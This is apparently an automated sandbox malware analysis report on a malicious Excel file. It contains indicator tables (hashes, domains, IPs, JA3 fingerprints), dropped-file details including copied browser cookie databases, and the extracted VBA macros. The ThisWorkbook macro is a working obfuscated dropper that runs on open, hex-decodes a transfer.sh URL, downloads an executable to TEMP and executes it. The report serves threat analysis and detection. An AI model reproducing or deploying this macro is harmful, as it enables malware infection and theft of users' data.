	tXDPyCfwcY.exe	Get hash	malicious	Browse	transfer.sh/get/fvp22f/Aiebe.jpg
	4G5k6vDDlx.exe	Get hash	malicious	Browse	transfer.sh/get/a9xgDe/Gudsp.jpg
	81cofLYh1o.exe	Get hash	malicious	Browse	transfer.sh/get/guc4Cl/Mppvcqd.jpg
	SecuriteInfo.com.Trojan.DownloaderNET.322.17731.exe	Get hash	malicious	Browse	transfer.sh/get/uM4ooB/Xvyspuzxq.png
	Hr0Hgb5CWj.exe	Get hash	malicious	Browse	transfer.sh/get/q9wdd6/Mvuizr.log
	3baQS3WUdx.exe	Get hash	malicious	Browse	transfer.sh/get/IJwL7t/Kkvkby.png
	Jnfgs.exe	Get hash	malicious	Browse	transfer.sh/get/SkEyQd/Jnfgs.png
	Cheat_Setup.exe	Get hash	malicious	Browse	transfer.sh/get/6MBXDe/Srueaakv.png
	FCsaYN4YXX.exe	Get hash	malicious	Browse	transfer.sh/get/bwkgO4/Daggl.jpg
	vVh3lBaKu8.exe	Get hash	malicious	Browse	transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
	Jaravoi.exe	Get hash	malicious	Browse	transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
	Qxyey.exe	Get hash	malicious	Browse	transfer.sh/get/5WciVO/Qxyey.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
transfer.sh	00023GHS2022.xls	Get hash	malicious	Browse	144.76.136.153
	EFAX_07042022.EXE	Get hash	malicious	Browse	144.76.136.153
	Order -5958866.exe	Get hash	malicious	Browse	144.76.136.153
	PO#121080666.exe	Get hash	malicious	Browse	144.76.136.153
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	144.76.136.153
	April order G8800-grff4454_pdf.exe	Get hash	malicious	Browse	144.76.136.153
	shipping documents pl&bl draft .exe	Get hash	malicious	Browse	144.76.136.153
	Purchase order 26865.exe	Get hash	malicious	Browse	144.76.136.153
	DHL-Doc.exe	Get hash	malicious	Browse	144.76.136.153
	8PtCHGXy6c.exe	Get hash	malicious	Browse	144.76.136.153
	BLLLLAADDEE.exe	Get hash	malicious	Browse	144.76.136.153
	New Order BLLLLAADDEE.exe	Get hash	malicious	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Browse	144.76.136.153
	BhyzQZkTBA.exe	Get hash	malicious	Browse	144.76.136.153
	original shipping document pl&bl draft.exe	Get hash	malicious	Browse	144.76.136.153
	New order Nr 03-2022 Payment.pdf.exe	Get hash	malicious	Browse	144.76.136.153
	CFDI_686509.xll	Get hash	malicious	Browse	144.76.136.153
	Setup.exe	Get hash	malicious	Browse	144.76.136.153
	ksuO9C24QH.exe	Get hash	malicious	Browse	144.76.136.153
	ksuO9C24QH.exe	Get hash	malicious	Browse	144.76.136.153
api.telegram.org	payment advice.exe	Get hash	malicious	Browse	149.154.167.220
	IMG20220407_0003.xls.xlsx	Get hash	malicious	Browse	149.154.167.220
	00023GHS2022.xls	Get hash	malicious	Browse	149.154.167.220
	Shipment Notification 1903224363.xlsx	Get hash	malicious	Browse	149.154.167.220
	EFAX_07042022.EXE	Get hash	malicious	Browse	149.154.167.220
	New Order.exe	Get hash	malicious	Browse	149.154.167.220
	sample.exe	Get hash	malicious	Browse	149.154.167.220
	bp0.exe	Get hash	malicious	Browse	149.154.167.220
	NEW ORDER 8086A_461A.exe	Get hash	malicious	Browse	149.154.167.220
	New Purchase Order - April_06.exe	Get hash	malicious	Browse	149.154.167.220
	Scan00021.exe	Get hash	malicious	Browse	149.154.167.220
	SC 210122 PAYMENT ADVICE.exe	Get hash	malicious	Browse	149.154.167.220
	SC 210122 PAYMENT ADVICE.exe	Get hash	malicious	Browse	149.154.167.220
	TNT EXPRESS SHIPMENT ARRIVAL.gz.exe	Get hash	malicious	Browse	149.154.167.220
	A.I.F - March 2022.exe	Get hash	malicious	Browse	149.154.167.220
	SHIPPING ADVICE QINGTAO.exe	Get hash	malicious	Browse	149.154.167.220
	VOICE_MESSAGE0002110.EXE	Get hash	malicious	Browse	149.154.167.220
	yQHq6EYTv1691f2.exe	Get hash	malicious	Browse	149.154.167.220
	paymentcopy-pdf__________________________________.exe	Get hash	malicious	Browse	149.154.167.220
	RFQ PLLC105009207.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	00023GHS2022.xls	Get hash	malicious	Browse	144.76.136.153
	KqAK9h7Hlt.exe	Get hash	malicious	Browse	95.217.244.41
	Pago Recibo.xls	Get hash	malicious	Browse	144.76.114.254
	bjBfxFFCxo.exe	Get hash	malicious	Browse	95.217.244.41
	ntSVVsDLmG.exe	Get hash	malicious	Browse	78.47.227.68
	g5h7mijbXr.exe	Get hash	malicious	Browse	188.34.179.139
	C4IAMAXFkX.exe	Get hash	malicious	Browse	138.201.189.249
	eE6EoNKt4F.exe	Get hash	malicious	Browse	188.34.179.139
	EFAX_07042022.EXE	Get hash	malicious	Browse	144.76.136.153
	arm7	Get hash	malicious	Browse	136.243.18.83
	http://gmai.com	Get hash	malicious	Browse	168.119.139.96
	https://pecutool.com/herbalingenuity.html	Get hash	malicious	Browse	138.201.179.3
	A297BC0C90017B32DD1636F86F068B0B6C21C6E1EB1EA.exe	Get hash	malicious	Browse	148.251.234.93
	kKOVDPvwzL	Get hash	malicious	Browse	5.9.64.81
	3dnRGYWgIv	Get hash	malicious	Browse	144.79.90.22
	miori.x86	Get hash	malicious	Browse	136.243.206.139
	crypted_loader_dll_64Donat_5.dll	Get hash	malicious	Browse	159.69.207.20
	AWB DHL 7214306201_Shipment Notification.exe	Get hash	malicious	Browse	78.46.5.205
	Order -5958866.exe	Get hash	malicious	Browse	144.76.136.153
	kBuUHXfo46	Get hash	malicious	Browse	88.198.80.132

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	00023GHS2022.xls	Get hash	malicious	Browse	144.76.136.153
	FormularioXdeXautorizacionXdeXtarjetaXdeXcreditoXyXpasaporte.docx	Get hash	malicious	Browse	144.76.136.153
	9.ppam	Get hash	malicious	Browse	144.76.136.153
	1-7Q210.xlsx	Get hash	malicious	Browse	144.76.136.153
	calc.docx	Get hash	malicious	Browse	144.76.136.153
	ZkVDWQjQM4.docx	Get hash	malicious	Browse	144.76.136.153
	T#U00dcRK#U0130YE M#U00dc#U015eTER#U0130DEN #U00d6RNEK S#U0130PAR#U0130#U015e.doc	Get hash	malicious	Browse	144.76.136.153
	T#U00dcRK#U0130YE M#U00dc#U015eTER#U0130DEN #U00d6RNEK S#U0130PAR#U0130#U015e.doc	Get hash	malicious	Browse	144.76.136.153
	Holdings.doc	Get hash	malicious	Browse	144.76.136.153
	50%XprepaymentXform.xlsx	Get hash	malicious	Browse	144.76.136.153
	1aAlNsy3Iq.xls	Get hash	malicious	Browse	144.76.136.153
	bgW8GSkznN.xls	Get hash	malicious	Browse	144.76.136.153
	f6b6e5a98a5167e8f131.xls	Get hash	malicious	Browse	144.76.136.153
	aaaaaaa.xls	Get hash	malicious	Browse	144.76.136.153
	sale.xlsx	Get hash	malicious	Browse	144.76.136.153
	recip_conf_11698_1.xls	Get hash	malicious	Browse	144.76.136.153
	recip_conf_14518.xls	Get hash	malicious	Browse	144.76.136.153
	recip_conf_18666.xls	Get hash	malicious	Browse	144.76.136.153
	recip_conf_3590.xls	Get hash	malicious	Browse	144.76.136.153
	Request for Quotations 290322PH089 - Parker.docx	Get hash	malicious	Browse	144.76.136.153
36f7277af969a6947a61ae0b815907a1	IMG20220407_0003.xls.xlsx	Get hash	malicious	Browse	149.154.167.220
	00023GHS2022.xls	Get hash	malicious	Browse	149.154.167.220
	shipping documents050422.xlsx	Get hash	malicious	Browse	149.154.167.220
	Invoice5678696.xlsx	Get hash	malicious	Browse	149.154.167.220
	order.883894.xlsx	Get hash	malicious	Browse	149.154.167.220
	MAN POWER NEW ORDER.xlsx	Get hash	malicious	Browse	149.154.167.220
	Feburary shipping documents.xlsx	Get hash	malicious	Browse	149.154.167.220
	order98904.xlsx	Get hash	malicious	Browse	149.154.167.220
	022_confirmaci#U00f3n de la direcci#U00f3n de entrega.xlsx	Get hash	malicious	Browse	149.154.167.220
	Bank Payment Advice.xlsx	Get hash	malicious	Browse	149.154.167.220
	Swift.xlsx	Get hash	malicious	Browse	149.154.167.220
	RFQ March 2022.xlsx	Get hash	malicious	Browse	149.154.167.220
	KMT_Order_03022.xlsx	Get hash	malicious	Browse	149.154.167.220
	swft3287348634.xlsx	Get hash	malicious	Browse	149.154.167.220
	SHIPMENT 12 2020 CIFF.xlsx	Get hash	malicious	Browse	149.154.167.220
	New Order PO Ref 01002020.xlsx	Get hash	malicious	Browse	149.154.167.220
	P. Order & Contract (A-4553).xlsx	Get hash	malicious	Browse	149.154.167.220
	510_07-HXTHUY-20220228145015-82145335-MAIL.xlsx	Get hash	malicious	Browse	149.154.167.220
	specification.xlsx	Get hash	malicious	Browse	149.154.167.220
	RFQ_#15203540018.xlsx	Get hash	malicious	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	QT22034701.xlsx	Get hash	malicious	Browse
	00023GHS2022.xls	Get hash	malicious	Browse
	Shipment Notification 1903224363.xlsx	Get hash	malicious	Browse
	New_Order_April.xlsx	Get hash	malicious	Browse
	Product_list.xlsx	Get hash	malicious	Browse
	REQUEST FOR QUOTATION OUR REF TRENT-2587.xlsx	Get hash	malicious	Browse
	DOC_MDR0307_019.doc	Get hash	malicious	Browse
	DOC_MDR0307_019.doc	Get hash	malicious	Browse
	P0_00122.doc	Get hash	malicious	Browse
	PO 11325201021.xlsx	Get hash	malicious	Browse
	PO #11325201021.xlsx	Get hash	malicious	Browse
	we-ship-SNE-9874657.xlsx	Get hash	malicious	Browse
	Import order764536.xlsx	Get hash	malicious	Browse
	PI.xlsx	Get hash	malicious	Browse
	swift.xls	Get hash	malicious	Browse
	PENDING INVOICES.doc	Get hash	malicious	Browse
	RFQ-2201847.xlsx	Get hash	malicious	Browse
	Postal Financial Services.doc	Get hash	malicious	Browse
	85a3f6aa_by_Libranalysis.rtf	Get hash	malicious	Browse
	Files Specification.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\dropped.exe

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546816
Entropy (8bit):	7.851006270797574
Encrypted:	false
SSDEEP:	12288:lhJzE0ZQ/je1q/ezctcRDqtA0+sjPnl/RYMxH0+A7s:LJzExj9/eOWutA0+sjflD0+A7s
MD5:	E2D002B5319A8CE475A7F355254A67A0
SHA1:	0062621525438DB106A37D71FA6DD9A46DE91F8F
SHA-256:	F30853C19A6BEE4B572E1F8434D346601EEF8C12F98B35BBB39FFC43AEAD7D53
SHA-512:	037DCBD120C417852DE4787DE0151BBBD8E142EF6D3473C9A1D808143047355571CF2663CC32FB2C7114350612AE56811340C680F61F30BC11BAFF7CFD3A1EBD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".Nb..............0..2...$......~P... ...`....@.. ....................................@.................................0P..K....`..H!........................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc...H!...`..."...4..............@..@.reloc...............V..............@..B................`P......H...........H............6..Q.............................................{....J8......}....8.......{....6..}....8........{....J8......}....8.......{....6..}....8.......0..p.......(....8.....(.... .....:....&8....8........E..../...8......(....8.......(....8.........(....8........(....8....n8.........2(....(....8....F....Z(....8........0.......... ........8........E....y.......8t...8$...8.......(...... ....(....9....&8......*.{.....(.....(....X#.......@[Y..Z..(....

C:\Users\user\AppData\Roaming\BINGO\BINGO.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45216
Entropy (8bit):	6.136703067968073
Encrypted:	false
SSDEEP:	768:Vjs96lj/cps+zk2d0suWB6Iq8NbeYjiwMEBQwp:VAhRzdd0sHI+eYfMEBHp
MD5:	62CE5EF995FD63A1847A196C2E8B267B
SHA1:	114706D7E56E91685042430F783AE227866AA77F
SHA-256:	89F23E31053C39411B4519BF6823969CAD9C7706A94BA7E234B9062ACE229745
SHA-512:	ABACC9B3C03631D3439A992504A11FB3C817456FFA4760EACE8FE5DF86908CE2F24565A717EB35ADCF60C34A78A1F6E24881BA0B8680FDE66D97085FDE4423B2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: QT22034701.xlsx, Detection: malicious, Browse Filename: 00023GHS2022.xls, Detection: malicious, Browse Filename: Shipment Notification 1903224363.xlsx, Detection: malicious, Browse Filename: New_Order_April.xlsx, Detection: malicious, Browse Filename: Product_list.xlsx, Detection: malicious, Browse Filename: REQUEST FOR QUOTATION OUR REF TRENT-2587.xlsx, Detection: malicious, Browse Filename: DOC_MDR0307_019.doc, Detection: malicious, Browse Filename: DOC_MDR0307_019.doc, Detection: malicious, Browse Filename: P0_00122.doc, Detection: malicious, Browse Filename: PO 11325201021.xlsx, Detection: malicious, Browse Filename: PO #11325201021.xlsx, Detection: malicious, Browse Filename: we-ship-SNE-9874657.xlsx, Detection: malicious, Browse Filename: Import order764536.xlsx, Detection: malicious, Browse Filename: PI.xlsx, Detection: malicious, Browse Filename: swift.xls, Detection: malicious, Browse Filename: PENDING INVOICES.doc, Detection: malicious, Browse Filename: RFQ-2201847.xlsx, Detection: malicious, Browse Filename: Postal Financial Services.doc, Detection: malicious, Browse Filename: 85a3f6aa_by_Libranalysis.rtf, Detection: malicious, Browse Filename: Files Specification.xlsx, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.W..............0..d............... ........@.. ...............................J....`.....................................O.......8............r...>..........t................................................ ............... ..H............text....c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B........................H........+..4S..........$...P...t........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o.........(....o ...o!.....,..o"...t........0..(....... ....s#........o$....X..(....-...o%....0...........(&......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\AppData\Roaming\k1sqi2ag.u2m\Chrome\Default\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.9650411582864293
Encrypted:	false
SSDEEP:	48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5:	903C35B27A5774A639A90D5332EEF8E0
SHA1:	5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256:	1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512:	076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\k1sqi2ag.u2m\Firefox\Profiles\7xwghk55.default\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.08107860342777487
Encrypted:	false
SSDEEP:	48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5:	1138F6578C48F43C5597EE203AFF5B27
SHA1:	9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256:	EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512:	6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious:	false
Preview:	SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Apr 7 08:26:18 2022, Last Saved Time/Date: Thu Apr 7 08:26:20 2022, Security: 0
Entropy (8bit):	4.323038039706295
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	00001.LPCD2022.xls
File size:	38912
MD5:	eccc1d5afe2f72a48203944b1abf01a3
SHA1:	32597a76c5e04fa67b6199bc9817ebdb9e1b7f71
SHA256:	6122dce9933f03479b3d98aea0785ae26737644262ac9ee8a67cbfbf11050f13
SHA512:	29e00c877b224a9f7201dae30ac20eb36bb33a6b0b73327334877a518c29834cea7ffa1126ad4aa6b5b5d610440f5588a540e17fc115808f35f2498aefca4b14
SSDEEP:	768:+qDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAK1UIb82H+jEfmHGr1XKzTY:3DZ+RwPONXoRjDhIcp0fDlaGGx+cL26k
TLSH:	25033EA6B291D806D94807754CE7C7E62B26FC61AF67838B32C5F71F2E75A80C913613
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "00001.LPCD2022.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Create Time:	2022-04-07 07:26:18.342000
Last Saved Time:	2022-04-07 07:26:20
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T / . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 06 54 2f fd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T _ . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 06 54 5f b2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 06 54 94 ab 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 3582

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	3582
Data ASCII:	. . . . . . . . . T . . . . . . . . . . . . . . . [ . . . . . . . . . . . . . . . . T . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 54 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 5b 04 00 00 db 09 00 00 00 00 00 00 01 00 00 00 06 54 b3 9f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub cjpojbxatghyew()
Dim xoiiovcnqn As String
Dim xdgiejom As String
Dim nvezeahcpysxmsykuzbe As Object, mclnjwgjqaeyhh As Object
Dim eycdwsxiwe As Integer
xoiiovcnqn = wyfqtgmzehxe("68") & wyfqtgmzehxe("747470733a2f2f7472616e736665722e73682f5576355846592f303030302e4c504344323032322e657865")
xdgiejom = wyfqtgmzehxe("64726f") & wyfqtgmzehxe("707065642e657865")
xdgiejom = Environ("TEMP") & "\" & xdgiejom
Set nvezeahcpysxmsykuzbe = CreateObject(wyfqtgmzehxe("4d53584d4c322e5365727665") & wyfqtgmzehxe("72584d4c485454502e362e30"))
nvezeahcpysxmsykuzbe.setOption(2) = 13056
nvezeahcpysxmsykuzbe.Open wyfqtgmzehxe("474554"), xoiiovcnqn, False
nvezeahcpysxmsykuzbe.setRequestHeader wyfqtgmzehxe("557365722d") & wyfqtgmzehxe("4167656e74"), wyfqtgmzehxe("4d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e542035") & wyfqtgmzehxe("2e3029")
nvezeahcpysxmsykuzbe.Send
If nvezeahcpysxmsykuzbe.Status = 200 Then
Set mclnjwgjqaeyhh = CreateObject(wyfqtgmzehxe("4144") & wyfqtgmzehxe("4f44422e53747265616d"))
mclnjwgjqaeyhh.Open
mclnjwgjqaeyhh.Type = 1
mclnjwgjqaeyhh.Write nvezeahcpysxmsykuzbe.ResponseBody
mclnjwgjqaeyhh.SaveToFile xdgiejom, 2
mclnjwgjqaeyhh.Close
qgssfhxdi xdgiejom
End If
End Sub
Sub Workbook_Open()
cjpojbxatghyew
End Sub
Private Function wyfqtgmzehxe(ByVal iosusgmoatjf As String) As String
Dim wwsxtjjexree As Long
For wwsxtjjexree = 1 To Len(iosusgmoatjf) Step 2
wyfqtgmzehxe = wyfqtgmzehxe & Chr$(Val("&H" & Mid$(iosusgmoatjf, wwsxtjjexree, 2)))
Next wwsxtjjexree
End Function

VBA File Name: dogbdtbkc.bas, Stream Size: 1233

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dogbdtbkc
VBA File Name:	dogbdtbkc.bas
Stream Size:	1233
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 84 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 8b 02 00 00 eb 03 00 00 00 00 00 00 01 00 00 00 06 54 02 32 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "dogbdtbkc"
Sub qgssfhxdi(mdrurnicxqgnk As String)
On Error Resume Next
Err.Clear
wimResult = wdzlbznhf(mdrurnicxqgnk)
If Err.Number <> 0 Or wimResult <> 0 Then
Err.Clear
kwsdbwalvozrufglg mdrurnicxqgnk
End If
On Error GoTo 0
End Sub

VBA File Name: vzbprmttn.bas, Stream Size: 2205

General
Stream Path:	_VBA_PROJECT_CUR/VBA/vzbprmttn
VBA File Name:	vzbprmttn.bas
Stream Size:	2205
Data ASCII:	. . . . . . . . . \\ . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . T . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
